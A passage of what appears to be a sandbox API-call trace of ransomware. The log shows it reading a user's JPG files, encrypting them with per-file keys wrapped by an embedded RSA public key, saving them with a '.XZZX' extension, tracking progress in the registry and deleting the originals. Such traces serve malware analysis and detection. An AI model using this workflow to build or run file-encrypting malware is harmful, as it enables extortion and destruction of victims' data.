lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x14, lpOverlapped=0x0) returned 1 [0126.269] SetFilePointer (in: hFile=0x60c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x24ea [0126.270] WriteFile (in: hFile=0x60c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0126.270] SetFilePointer (in: hFile=0x60c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x24ef [0126.270] SetErrorMode (uMode=0x1) returned 0x1 [0126.270] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0126.270] OutputDebugStringW (lpOutputString="end") [0126.270] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x08\x86Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.270] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0126.270] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3d1e0a0) returned 1 [0126.271] CryptImportPublicKeyInfo (in: hCryptProv=0x3d1e0a0, dwCertEncodingType=0x1, pInfo=0x3d0d958*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0d988*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0d990*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3cddf98) returned 1 [0126.271] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0126.272] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0126.272] CryptEncrypt (in: hKey=0x3cddf98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0126.272] CryptEncrypt (in: hKey=0x3cddf98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3d1e128*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3d1e128*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0126.272] WriteFile (in: hFile=0x60c, lpBuffer=0x3d1e128*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3d1e128*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0126.272] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0126.272] WriteFile (in: hFile=0x60c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0126.272] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0126.272] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0126.272] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x614) returned 0x0 [0126.273] RegQueryValueExW (in: hKey=0x614, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x9a, lpcbData=0x420dfdc*=0x4) returned 0x0 [0126.273] RegCloseKey (hKey=0x614) returned 0x0 [0126.273] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x614) returned 0x0 [0126.273] RegSetValueExW (in: hKey=0x614, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x9b, cbData=0x4 | out: lpData=0x420dfec*=0x9b) returned 0x0 [0126.273] RegCloseKey (hKey=0x614) returned 0x0 [0126.273] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0126.273] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0126.274] CloseHandle (hObject=0x60c) returned 1 [0126.275] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0126.275] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0126.275] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PTV-5E.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ptv-5e.jpg")) returned 1 [0126.277] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\PTV-5E.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ptv-5e.jpg")) returned 0 Thread: id = 419 os_tid = 0x99c [0126.320] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0126.320] lstrcpyW (in: lpString1=0x420f460, lpString2="VL2r.jpg" | out: lpString1="VL2r.jpg") returned="VL2r.jpg" [0126.320] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0126.320] SetErrorMode (uMode=0x1) returned 0x1 [0126.320] lstrcpyW (in: lpString1=0x420f860, lpString2="VL2r.jpg" | out: lpString1="VL2r.jpg") returned="VL2r.jpg" [0126.320] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x799956bd, Data2=0x2903, Data3=0x4b1f, Data4=([0]=0xa2, [1]=0x1b, [2]=0x40, [3]=0xa2, [4]=0xff, [5]=0x6a, [6]=0x28, [7]=0xe6))) returned 0x0 [0126.320] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VL2r.jpg") returned 51 [0126.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0126.320] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FBB049370C08D85D799956BD1029BCA5.XZZX") returned 80 [0126.320] StrStrW (lpFirst="VL2r.jpg", lpSrch="XZZX") returned 0x0 [0126.320] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VL2r.jpg", dwFileAttributes=0x20) returned 1 [0126.321] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VL2r.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vl2r.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0126.321] ReadFile (in: hFile=0x610, lpBuffer=0x4360048, nNumberOfBytesToRead=0x7a1b, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x4360048*, lpNumberOfBytesRead=0x420e418*=0x7a1b, lpOverlapped=0x0) returned 1 [0126.322] CloseHandle (hObject=0x610) returned 1 [0126.322] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0126.323] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0126.323] SetErrorMode (uMode=0x1) returned 0x1 [0126.323] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0126.323] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3d1e1b0) returned 1 [0126.325] CryptGenKey (in: hProv=0x3d1e1b0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cddc98) returned 1 [0126.448] CryptExportKey (in: hKey=0x3cddc98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0126.448] CryptExportKey (in: hKey=0x3cddc98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0126.448] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0126.448] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0126.449] CryptDestroyKey (hKey=0x3cddc98) returned 1 [0126.449] CryptReleaseContext (hProv=0x3d1e1b0, dwFlags=0x0) returned 1 [0126.449] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\FBB049370C08D85D799956BD1029BCA5.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\fbb049370c08d85d799956bd1029bca5.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0126.449] WriteFile (in: hFile=0x610, lpBuffer=0x4360048*, nNumberOfBytesToWrite=0x7a1b, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x4360048*, lpNumberOfBytesWritten=0x420e438*=0x7a1b, lpOverlapped=0x0) returned 1 [0126.451] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7a1b [0126.451] WriteFile (in: hFile=0x610, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0126.451] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7a20 [0126.451] WriteFile (in: hFile=0x610, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x10, lpOverlapped=0x0) returned 1 [0126.451] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7a30 [0126.451] WriteFile (in: hFile=0x610, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0126.451] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7a35 [0126.451] SetErrorMode (uMode=0x1) returned 0x1 [0126.451] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0126.451] OutputDebugStringW (lpOutputString="end") [0126.451] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x08\x86Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0126.451] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0126.452] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3d1e1b0) returned 1 [0126.452] CryptImportPublicKeyInfo (in: hCryptProv=0x3d1e1b0, dwCertEncodingType=0x1, pInfo=0x3d0da28*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0da58*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0da60*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3cddfd8) returned 1 [0126.452] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0126.453] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0126.453] CryptEncrypt (in: hKey=0x3cddfd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0126.453] CryptEncrypt (in: hKey=0x3cddfd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3d1e238*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3d1e238*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0126.453] WriteFile (in: hFile=0x610, lpBuffer=0x3d1e238*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3d1e238*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0126.453] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0126.453] WriteFile (in: hFile=0x610, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0126.453] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0126.454] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0126.454] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x618) returned 0x0 [0126.454] RegQueryValueExW (in: hKey=0x618, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x9b, lpcbData=0x420dfdc*=0x4) returned 0x0 [0126.454] RegCloseKey (hKey=0x618) returned 0x0 [0126.454] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x618) returned 0x0 [0126.454] RegSetValueExW (in: hKey=0x618, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x9c, cbData=0x4 | out: lpData=0x420dfec*=0x9c) returned 0x0 [0126.454] RegCloseKey (hKey=0x618) returned 0x0 [0126.454] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0126.455] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0126.455] CloseHandle (hObject=0x610) returned 1 [0126.457] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0126.458] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0126.458] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VL2r.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vl2r.jpg")) returned 1 [0126.460] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VL2r.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vl2r.jpg")) returned 0 Thread: id = 420 os_tid = 0x9a0 [0126.476] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0126.476] lstrcpyW (in: lpString1=0x420f460, lpString2="VUaHmntzHPrBw9rs6O1.jpg" | out: lpString1="VUaHmntzHPrBw9rs6O1.jpg") returned="VUaHmntzHPrBw9rs6O1.jpg" [0126.476] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0126.476] SetErrorMode (uMode=0x1) returned 0x1 [0126.476] lstrcpyW (in: lpString1=0x420f860, lpString2="VUaHmntzHPrBw9rs6O1.jpg" | out: lpString1="VUaHmntzHPrBw9rs6O1.jpg") returned="VUaHmntzHPrBw9rs6O1.jpg" [0126.476] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xafd8291a, Data2=0xafe4, Data3=0x45c1, Data4=([0]=0xa8, [1]=0x15, [2]=0x4d, [3]=0x8, [4]=0x5f, [5]=0xf2, [6]=0x54, [7]=0xf0))) returned 0x0 [0126.476] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VUaHmntzHPrBw9rs6O1.jpg") returned 66 [0126.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0126.476] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\609D61282FED0EE4AFD8291A340DF32C.XZZX") returned 80 [0126.476] StrStrW (lpFirst="VUaHmntzHPrBw9rs6O1.jpg", lpSrch="XZZX") returned 0x0 [0126.476] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VUaHmntzHPrBw9rs6O1.jpg", dwFileAttributes=0x20) returned 1 [0126.477] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VUaHmntzHPrBw9rs6O1.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vuahmntzhprbw9rs6o1.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x614 [0126.477] ReadFile (in: hFile=0x614, lpBuffer=0x3cf1358, nNumberOfBytesToRead=0x188f0, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesRead=0x420e418*=0x188f0, lpOverlapped=0x0) returned 1 [0126.478] CloseHandle (hObject=0x614) returned 1 [0126.478] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0126.479] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0126.479] SetErrorMode (uMode=0x1) returned 0x1 [0126.479] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0126.479] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3d1e2c0) returned 1 [0126.484] CryptGenKey (in: hProv=0x3d1e2c0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3cddc98) returned 1 [0126.745] CryptExportKey (in: hKey=0x3cddc98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0126.745] CryptExportKey (in: hKey=0x3cddc98, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0126.745] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0126.746] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0126.746] CryptDestroyKey (hKey=0x3cddc98) returned 1 [0126.746] CryptReleaseContext (hProv=0x3d1e348, dwFlags=0x0) returned 0 [0126.746] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\609D61282FED0EE4AFD8291A340DF32C.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\609d61282fed0ee4afd8291a340df32c.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x61c [0126.746] WriteFile (in: hFile=0x61c, lpBuffer=0x3cf1358*, nNumberOfBytesToWrite=0x188f0, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf1358*, lpNumberOfBytesWritten=0x420e438*=0x188f0, lpOverlapped=0x0) returned 1 [0126.751] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x188f0 [0126.751] WriteFile (in: hFile=0x61c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0126.751] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x188f5 [0126.751] WriteFile (in: hFile=0x61c, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x2e, 